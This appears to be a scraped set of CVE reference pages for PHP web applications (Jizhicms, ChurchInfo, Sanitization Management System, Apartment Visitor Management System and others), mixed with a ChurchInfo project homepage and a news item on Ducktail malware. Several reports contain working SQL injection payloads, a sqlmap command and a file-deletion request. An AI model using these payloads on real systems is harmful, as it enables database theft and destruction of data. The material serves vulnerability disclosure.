Jizhicms v2.3.3 was discovered to contain a SQL injection vulnerability via the /Member/memberedit.html component.

**Issue**

SQL injection vulnerabilities exist under the function nodes of new members, and attackers can operate on databases

**Steps to reproduce**

1.  Log in to the background
2.  Click User Management>Member List>Add Member or Edit

Problematic packets:

    POST /index.php/admins/Member/memberedit.html HTTP/1.1
    Host: 192.168.150.136:85
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
    Accept: */*
    Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
    Accept-Encoding: gzip, deflate
    Content-Type: application/x-www-form-urlencoded; charset=UTF-8
    X-Requested-With: XMLHttpRequest
    Content-Length: 241
    Origin: http://192.168.150.136:85
    Connection: close
    Referer: http://192.168.150.136:85/index.php/admins/Member/memberedit/id/1163.html
    Cookie: Hm_lvt_948dba1e5d873b9c1f1c77078c521c89=1665907862; PHPSESSID=k7nc070b0c4h2f1kjo65l54aqf
    
    go=1&id=1163&username=xxxx&openid=&sex=2&gid=0&litpic=&file=&tel=&jifen=0.00&money=0.00&email=&province=&city=&address=&regtime=2022-10-19+19%3A34%3A02&logintime=2022-10-19+19%3A24%3A17&signature=&birthday=&pid=0&isshow=1&pass=&repass=123456
    

use sqlmap: python2 sqlmap.py -r ss.txt --batch -current-db  

    
    ---
    Parameter: id (POST)
        Type: time-based blind
        Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
        Payload: go=1&id=1163' AND (SELECT 3004 FROM (SELECT(SLEEP(5)))lPDg) AND 'fgEo'='fgEo&username=xxxx#&openid=&sex=2&gid=0&litpic=&file=&tel=&jifen=0.00&money=0.00&email=&province=&city=&address=&regtime=2022-10-19 19:34:02&logintime=2022-10-19 19:24:17&signature=&birthday=&pid=0&isshow=1&pass=&repass=123456
    ---

CVE-2022-44140: jizhicms v2.3.3 has a vulnerability, SQL injection · Issue #81 · Cherry-toto/jizhicms

An issue was discovered in JIZHI CMS 1.9.4. There is a CSRF vulnerability that can add an admin account via index, /admin.php/Admin/adminadd.html

\[CVE ID\]

CVE-2021-29334

\[PRODUCT\]

jizhicms

\[VERSION\]

v1.9.4

\[PROBLEM TYPE\]

Cross Site Request Forgery (CSRF)

\[DESCRIPTION\]

An issue was discovered in JIZHI CMS 1.9.4. There is a CSRF,vulnerability that can add an admin account via index.

CVE-2021-29334: CVE-2021-29334

CartView.php in ChurchInfo 1.3.0 allows attackers to achieve remote code execution through insecure uploads. This requires authenticated access tot he ChurchInfo application. Once authenticated, a user can add names to their cart, and compose an email. Uploading an attachment for the email stores the attachment on the site in the /tmp_attach/ folder where it can be accessed with a GET request. There are no limitations on files that can be attached, allowing for malicious PHP code to be uploaded and interpreted by the server.

**Looking for a Flagship Church**

The ChurchInfo team is looking for a flagship church to serve as a focal point for for the development team.  We know that many churches are using our software, and we want to cultivate a special relationship with at least one and possibly several churches to challenge and inspire us.

We can offer the following:

\- Free hosting on churchinfoservices.com, or support on the hosting service of your choice

\- Priority access to support from the development team

\- Priority consideration for the development of new features that are of special interest to your church

In return, we request the following:

\- Use all the features of ChurchInfo that make sense for your church.  ChurchInfo is designed to serve as your only membership database so you only need to maintain membership information in one place.

\- Tell us about any difficulties you have or suggestions for improvement.

The most satisfying thing about supporting the ChurchInfo open source project is knowing that churches can rely on this open-source alternative to expensive church management systems.  If you are looking for a new database solution, or perhaps your first database solution, press the "Contact Us" link toward the upper-right part of this page to inquire.

**Inexpensive Hosting Service Now Available**

After more than twelve years as a purely volunteer venture ChurchInfo has teamed up with a small company called ChurchInfo Services to provide hosting service and automated installation.  This service is designed to be an inexpensive option for churches that don't have access to the necessary technical skills to build and maintain their own installations.  There is no change to the core mission and values of the ChurchInfo project.  The goal is to expand the availability of ChurchInfo to more churches, especially those which found the initial installation to be too much of a hurdle.

Here is a link to the ChurchInfo Services web site.

**Upgrading ChurchInfo**

All versions of ChurchInfo since 1.2.7 are designed to upgrade the database automatically.  Here are the steps to complete the upgrade process:

*   Back up your database using phpMyAdmin.  Select your ChurchInfo database from the list to the left, then select the export tab across the top to the right.  The default export options should be fine and it should give you a copy of your entire database in a ".sql" file.
*   Make a copy of your old file Include/Config.php.  This file contains the database configuration settings near the beginning of the file.
*   If you have been uploading images make a copy of your Images directory with the sub-directories Person, Person/thumbnails, Family, and Family/thumbnails.
*   Extract the ChurchInfo distribution from the .tar.gz file of the .zip file.
*   Copy the new files over your previous installation, making sure they wind up in the same place.  FileZilla is good about doing this recursive upload copy if you need to use FTP.
*   Transfer the database settings from your saved copy of Include/Config.php to the new installation.
*   Log in as usual.  The first thing it will do is upgrade the database, then the new version will be operational.

If you prefer, you can rename your installation directory to set it aside and then install the ChurchInfo distribution into the original installation directory.  If you install this way you will need to copy any image files from the renamed installation directory to the same spot in the new installation.

**Release 1.3.0 Available Now****Major new feature: Self-Service Interface**

The self-service interface allows members to maintain their own personal  
information, enter pledges and electronic payment methods, and make immediate  
or scheduled electronic donations.  This interface is designed to be easily  
embedded in a church web site or it can run stand-alone.  The starting point  
for the self-service interface is SelfRegisterHome.php.

**Support for newer versions of PHP and MySQL (now MariaDB)**

The developers of PHP have obsoleted the mysql library that was used in  
previous versions of ChurchInfo.  This release uses the newest library for  
compatibility with PHP 7.  Many of the developers of MySQL have moved to  
a new purely open-source database called MariaDB which is based on MySQL and  
fully compatibly with ChurchInfo.  Several of the query constructs used in  
previous versions of ChurchInfo are now unsupported and have been updated  
in this release.

**Electronic donations through Vanco**

The new self-service interface supports electronic donations through Vanco  
only.  There will probably be another release soon to support Authorize.NET  
and perhaps Moneris if there is interest.

**Numerous bug fixes and minor improvements**

There are numerous bug fixes and minor improvements in this release.  Details  
are in the Git repository "CodeGit" on SourceForge.

**Moving ChurchInfo**

I often get this question- "How can I move ChurchInfo from one server to another?"  Fortunately, the process for moving ChurchInfo is pretty easy:

\- Use phpMyAdmin to back up the entire database to a sql file  
\- Copy the entire file structure under the churchinfo directory to the new server  
\- Use phpMyAdmin on the destination to create the ChurchInfo database, populate it using the back-up file rather than running SQL/Install.sql  
\- Edit the file Include/Config.php on the destination to establish the database connection on the new server  
\- Log into ChurchInfo on the new server

The only tricky step is editing Include/Config.php.  Hosting services tend to have different and incompatible rules about how databases and database users are named, and the database host may be different from "localhost".

This process transfers everything so all the same logins will still work on the new server.

The nature of the servers does not matter as long as Include/Config.php contains the necessary database connection information.  For my own church I frequently bring the database back to a PC running xampp to try things that I would not try on the active server.

**Read Before Downloading**

ChurchInfo is a web server application, which is nice because you can use it from anywhere with a browser but it isn't your typical download/install application.  If you just want to run stand-alone on a PC please read the article below "Simple Installation on Windows".  You can get the server infrastructure from xampp and then browse to localhost.  The general instructions for installing on any server are in the distribution file Documentation/Readme.txt.  There is a shared demo running on our web site; see article below "Try our demo".  You can also register for a private demo that will run for a few weeks.  See the article below "Private Demos Now Available".  Your experience running a demo on our web site will be exactly the same as running your own installation.  If you have any trouble with the shared demo, or a private demo, please use the "Contact Us" link above and tell us what happened.  We can normally fix issues with the demos the same day.

If you want to use a commercial server please do not use GoDaddy.  Their servers seem to be overwhelmed and trying to use the admin interface is terribly frustrating.

**Demonstration Videos****Introduction Video**

This is a very quick demonstration video showing operation of our demo installation.  You can use the demo any time starting from the link near the bottom of this page.  If the shared demo gets too messed up please send me a message and I will reset it.

Watch introduction

**Self-Service Features Video**

This video uses the nightly build demonstration to show off the new self-services feature in release 1.3.0.  The nightly build is reset every night so it is a good place to do experiments starting from a fresh installation.

Watch self-service

**Financial Features Video**

A lot of people have been watching the quick introduction video so I decided to make another one focusing on the deposit slip.  I get a lot of questions about the financial features of ChurchInfo and this video answers many of the most common questions.  If you would like to see more videos for other subjects please use the contact link to send me email.

Watch financial features  

**Installation Demonstration**

This new video shows the latest version of ChurchInfo being installed on a free server service.

Watch Installation on Free Server

These two videos take you through the entire process of installing on a commercial server.  These videos are older and the server services have improved since the videos were made.  The free server installation above is more representative of modern server services.

Watch installation

Watch test and debug

**Auction Automation**

This video is about using the ChurchInfo FundRaiser feature to facilitate an auction event.

Watch Auction

**Private Demos Now Available**

We can now host private demo installations to facilitate your evaluation process.  These demo installations are created in randomly named directories.  The purpose of these private demos is to give you a chance to experiment in your own space.  You can enter a little data, show your minister and your treasurer how it works, without having to worry about someone changing the admin password or deleting half the menu options.  Your demo space will be private but not particularly secure or permanent.  Please don't put a lot of work into it as it will be deleted in about a week unless you ask for more time.  Assuming your evaluation goes well please plan to download and install in your own world as soon as possible.

Please don't put nonsense for contact information.  Your contact information will only be used to communicate about ChurchInfo and will not be shared or sold for any other purpose.  If you put nonsense in the Private Demo Form your demo will probably be recycled soon and you will get Error 404 page not found while trying to use your private demo.

To get started with your private demo use this link: Private Demo Form

If you have any trouble with the private demo please use the "Contact us" link at the top of the page and tell us what happened.  We should be able to fix it for you.

**To our international users**

You can set the language by changing sLanguage in Admin->Edit General Settings.  ChurchInfo currently supports the following settings: de\_DE (German), en\_AU (Australian English), fr\_FR (French, not updated recently), it\_IT (Italian, not updated recently), nl\_NL (Dutch), pt\_BR (Brazilian Portuguese), sv\_SE (Swedish).  If you would like to develop a new translation please let me know!

**Try our Demo**

We have a demo installation of the latest version 1.3.0 available here The self-service interface for this demo installation is here.

Feel free to play with this database to see if ChurchInfo will work for your church. The password for this demo database is: “demoadmin” for Admin.  See the links below if you find a bug or want to discuss an issue.

**Help Test The Very Latest from the Development Team**

There is an automatically updated installation directly from our Git source control server here.  Please play with this version and report any issues in the bug trackers.  Log in with user name admin, password demoadmin.  No other logins are configured automatically.  If you prefer to take the very latest to your own playground this installation archive .tar.gz file is updated nightly: churchinfo-latest.tar.gz.

**Simple Installation on Windows**

I often get request from people who want to quickly install ChurchInfo on a computer running Windows.  This is a great way to get started and experiment, although the real power of ChurchInfo is best appreciated when it is running on a server and accessed from multiple different computers.  I use this procedure to install ChurchInfo for experimenting or development on a Windows laptop.

I have had good luck hopping back and forth between this stand-alone installation as a real server, simply using phpMyAdmin to back up and restore the database.

Here are the step-by-step instructions:

Install xampp for Windows.  This provides Apache, PHP and MySQL.  I tell it to run Apache and MySQL as services.

Unpack the churchinfo directory from the distribution into the directory C:\\xampp\\htdocs\\churchinfo  
Use Firefox or Chrome to browse to: http://localhost  
Click the phpMyAdmin link  
Select the Privileges tab  
Press Add a new user

Set User name to "churchinfo", Host to "localhost", Password to "churchinfo", Re-type to "churchinfo", enable "create database and assign all priviledges; them press Go (bottom-right)  
Select the new churchinfo database from the link to the left  
Select the Import tab  
Press Browse...  
Navigate to C:\\xampp\\htdocs\\churchinfo\\SQL\\Install.sql and choose this file  
Press the Go button  
Now browse to: http://localhost/churchinfo  
Log in with user name "admin", password "churchinfoadmin"  
It will ask you to change the password immediately.

CVE-2021-43258: ChurchInfo open source church database created with PHP & MySQL! - ChurchInfo open source church database created with PHP & MySQL!

SQL Injection vulnerability in function get_user in login_manager.php in rizalafani cms-php v1.

**Have a question about this project?** Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

Pick a username

Email Address

Password

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

CVE-2021-35284: Login page SQL injection · Issue #1 · rizalafani/cms-php

`yiisoft/yii` before version 1.1.27 are vulnerable to Remote Code Execution (RCE) if the application calls `unserialize()` on arbitrary user input. This has been patched in 1.1.27.

High

samdark published GHSA-442f-wcwq-fpcf

Nov 21, 2022

**Package**

composer yiisoft/yii (Composer)

**Affected versions**

<1.1.27

**Patched versions**

1.1.27

**Description**

**Impact**

Affected versions of yiisoft/yii are vulnerable to Remote Code Execution (RCE) if the application calls unserialize() on arbitrary user input.

**Patches**

Upgrade yiisoft/yii to version 1.1.27 or higher.

**For more information**

See the following links for more details:

*   Git commit
*   https://owasp.org/www-community/vulnerabilities/PHP\_Object\_Injection

If you have any questions or comments about this advisory, contact us through security form.

**Severity**

High

8.1

/ 10

**CVSS base metrics**

Attack vector

Network

Attack complexity

High

Privileges required

None

User interaction

None

Scope

Unchanged

Confidentiality

High

Integrity

High

Availability

High

CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H

**CVE ID**

CVE-2022-41922

**Weaknesses**

CWE-502

**Credits**

*    fi3wey

CVE-2022-41922: Prevent RCE when deserializing untrusted user input

Sanitization Management System v1.0 is vulnerable to SQL Injection via /php-sms/admin/?page=user/manage_user&id=.

Permalink

Cannot retrieve contributors at this time

**Sanitization Management System v1.0 by oretnom23 has SQL injection**

BUG\_Author: tpaer

Login account: admin/admin123 (Super Admin account)

vendors: https://www.sourcecodester.com/php/15770/sanitization-management-system-project-php-and-mysql-free-source-code.html

The program is built using the xmapp-php8.1 version

Vulnerability File: /php-sms/admin/?page=user/manage\_user&id=

Vulnerability location: /php-sms/admin/?page=user/manage\_user&id=, id

dbname =sms\_db,length=6

\[+\] Payload: /php-sms/admin/?page=user/manage\_user&id=1%27%20and%20updatexml(1,concat(0x7e,(select%20database()),0x7e),0)--+ // Leak place ---> id

GET /php\-sms/admin/?page\=user/manage\_user&id\=1%27%20and%20updatexml(1,concat(0x7e,(select%20database()),0x7e),0)\--\+ HTTP/1.1
Host: 192.168.1.88
User\-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:46.0) Gecko/20100101 Firefox/46.0
Accept: text/html,application/xhtml+xml,application/xml;q\=0.9,\*/\*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
DNT: 1
Cookie: PHPSESSID=3puonr8mf2gr4m6iivf71mhjtq
Connection: close

CVE-2022-44278: bug_report/SQLi-1.md at main · Onetpaer/bug_report

Apartment Visitor Management System v1.0 is vulnerable to SQL Injection via /avms/index.php.

Permalink

Cannot retrieve contributors at this time

**Apartment Visitor Management System v1.0 by oretnom23 has SQL injection**

BUG\_Author: zhaoqiushi

vendors:https://www.sourcecodester.com/php-apartment-visitor-management-system-source-code

Vulnerability File: /avms/index.php

Parameter "username" (POST), exists delayed injection vulnerability

Payload1: username=12' AND (SELECT 1 FROM (SELECT(SLEEP(20)))qw) AND 'bc'='bc&password=34&login=

    POST /avms/index.php HTTP/1.1
    Host: localhost
    Content-Length: 112
    Cache-Control: max-age=0
    sec-ch-ua: "Chromium";v="97", " Not;A Brand";v="99"
    sec-ch-ua-mobile: ?0
    sec-ch-ua-platform: "Windows"
    Upgrade-Insecure-Requests: 1
    Origin: http://localhost
    Content-Type: application/x-www-form-urlencoded
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.71 Safari/537.36
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
    Sec-Fetch-Site: same-origin
    Sec-Fetch-Mode: navigate
    Sec-Fetch-User: ?1
    Sec-Fetch-Dest: document
    Referer: http://localhost/avms/index.php
    Accept-Encoding: gzip, deflate
    Accept-Language: en-US,en;q=0.9,zh-CN;q=0.8,zh;q=0.7
    Cookie: PHPSESSID=pffl7cq1luqqavsphrt8r525gf
    Connection: close
    
    username=12%27+AND+%28SELECT+1+FROM+%28SELECT%28SLEEP%2820%29%29%29qw%29+AND+%27bc%27%3D%27bc&password=34&login=
    

select(sleep(20)) The server response time is 20 seconds

Payload2: username=12' AND (SELECT 1 FROM (SELECT(SLEEP(10)))qw) AND 'bc'='bc&password=34&login=

    POST /avms/index.php HTTP/1.1
    Host: localhost
    Content-Length: 112
    Cache-Control: max-age=0
    sec-ch-ua: "Chromium";v="97", " Not;A Brand";v="99"
    sec-ch-ua-mobile: ?0
    sec-ch-ua-platform: "Windows"
    Upgrade-Insecure-Requests: 1
    Origin: http://localhost
    Content-Type: application/x-www-form-urlencoded
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.71 Safari/537.36
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
    Sec-Fetch-Site: same-origin
    Sec-Fetch-Mode: navigate
    Sec-Fetch-User: ?1
    Sec-Fetch-Dest: document
    Referer: http://localhost/avms/index.php
    Accept-Encoding: gzip, deflate
    Accept-Language: en-US,en;q=0.9,zh-CN;q=0.8,zh;q=0.7
    Cookie: PHPSESSID=pffl7cq1luqqavsphrt8r525gf
    Connection: close
    
    username=12%27+AND+%28SELECT+1+FROM+%28SELECT%28SLEEP%2810%29%29%29qw%29+AND+%27bc%27%3D%27bc&password=34&login=
    

select(sleep(10)) The server response time is 10 seconds

CVE-2022-44139: bug_report/SQLi-1.md at main · 375978342/bug_report

Automotive Shop Management System v1.0 is vulnerable to Delete any file via /asms/classes/Master.php?f=delete_img.

**Automotive Shop Management System v1.0 by oretnom23 has Delete any file**

BUG\_Author: tpaer

Login account: admin/admin123 (Super Admin account)

vendors: https://www.sourcecodester.com/php/15312/automotive-shop-management-system-phpoop-free-source-code.html

Vulnerability File: /asms/classes/Master.php?f=delete\_img

Vulnerability location: /asms/classes/Master.php?f=delete\_img, path

Payload:

POST /asms/classes/Master.php?f\=delete\_img HTTP/1.1
Host: 192.168.1.88
User\-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:46.0) Gecko/20100101 Firefox/46.0
Accept: application/json, text/javascript, \*/\*; q=0.01
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
DNT: 1
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Referer: http://192.168.1.88/asms/admin/?page=system\_info
Content-Length: 64
Cookie: \_\_utma=78021076.1353699714.1665838696.1665838696.1665838696.1; \_\_utmz=78021076.1665838696.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); \_gauges\_unique\_month=1; \_gauges\_unique\_year=1; \_gauges\_unique=1; PHPSESSID=ocll92n082l6eedlf8jugi8i1r
Connection: close
path=C%3A%2Fxampp%2Fhtdocs%2Fasms%2Fuploads%2Fbanner%2Fshell.php

Here we delete the shel.php file in the directory

Currently, when we do not send a request to delete the shell.php file, the shell.php file is still in the directory of the website

The response package shows that the deletion was successful. Let's go to the directory to see if the shell.php file still exists. 

By this time, shell.php has been deleted.

CVE-2022-44280: bug_report/delete-1.md at main · Onetpaer/bug_report

The operators of the Ducktail information stealer have demonstrated a "relentless willingness to persist" and continued to update their malware as part of an ongoing financially driven campaign.
"The malware is designed to steal browser cookies and take advantage of authenticated Facebook sessions to steal information from the victim's Facebook account," WithSecure researcher Mohammad Kazem

The operators of the Ducktail information stealer have demonstrated a "relentless willingness to persist" and continued to update their malware as part of an ongoing financially driven campaign.

"The malware is designed to steal browser cookies and take advantage of authenticated Facebook sessions to steal information from the victim's Facebook account," WithSecure researcher Mohammad Kazem Hassan Nejad said in a new analysis.

"The operation ultimately hijacks Facebook Business accounts to which the victim has sufficient access. The threat actor uses their gained access to run ads for monetary gain."

Attributed to a Vietnamese threat actor, the Ducktail campaign is designed to target businesses in the digital marketing and advertising sectors which are active on the Facebook Ads and Business platform.

Also targeted are individuals within prospective companies that are likely to have high-level access to Facebook Business accounts. This includes marketing, media, and human resources personnel.

The malicious activity was first documented by the Finnish cybersecurity company in July 2022. The operation is believed to be underway since the second half of 2021, although evidence points to the threat actor being active as far back as late 2018.

A subsequent analysis by Zscaler ThreatLabz last month uncovered a PHP version of the malware distributed as installers for cracked software. WithSecure, however, said the activity has no connection whatsoever to the campaign it tracks under the Ducktail moniker.

The latest iteration of the malware, which resurfaced on September 6, 2022, after the threat actor was forced to halt its operations on August 12 in response to public disclosure, comes with a host of improvements incorporated to circumvent detection.

Infection chains now commence with the delivery of archive files containing spreadsheet documents hosted on Apple iCloud and Discord through platforms like LinkedIn and WhatsApp, indicating diversification of the threat actor's spear-phishing tactics.

The Facebook Business account information collected by the malware, which is signed using digital certificates obtained under the guise of seven different non-existent businesses, is exfiltrated using Telegram.

"An interesting shift that was observed with the latest campaign is that \[the Telegram command-and-control\] channels now include multiple administrator accounts, indicating that the adversary may be running an affiliate program," Nejad explained.

Found this article interesting? Follow THN on Facebook, Twitter __ and LinkedIn to read more exclusive content we post.

Ducktail Malware Operation Evolves with New Malicious Capabilities

An access control issue in /Admin/dashboard.php of Record Management System using CodeIgniter v1.0 allows attackers to access and modify user data.

\[Suggested description\] An access control issue in /Admin/dashboard.php of Record Management System using CodeIgniter v1.0 allows attackers to access and modify user data.

\[Additional Information\] Proof Of Concept: https://drive.google.com/file/d/1Rre498CWp9pWyW9h5ran8GkW6TA2NztC/view?usp=sharing

\[Vulnerability Type\] Incorrect Access Control

\[VulnerabilityType Other\] Privile

\[Vendor of Product\] Phpgurukul

\[Affected Product Code Base\] Teachers Record Management System using CodeIgniter - 1.0

\[Affected Component\] user/Users endpoint in url

\[Attack Type\] Remote

\[Impact Escalation of Privileges\] true

\[Impact Information Disclosure\] true

\[Attack Vectors\] to Exploit the Vulnerability Attacker have to login with User account and attacker need to change user/Users endpoint in to admin/Admin endpoint in url,

> Eg: http://localhost/trms-ci/user/Users/dashboard Change to localhost/trms-ci/admin/Admin/dashboard

\[Reference\] https://phpgurukul.com/teachers-record-management-system-using-codeigniter/ https://drive.google.com/file/d/1Rre498CWp9pWyW9h5ran8GkW6TA2NztC/view?usp=sharing

\[Discoverer\] RashidKhan Pathan

Use CVE-2022-41446.

Tag

#php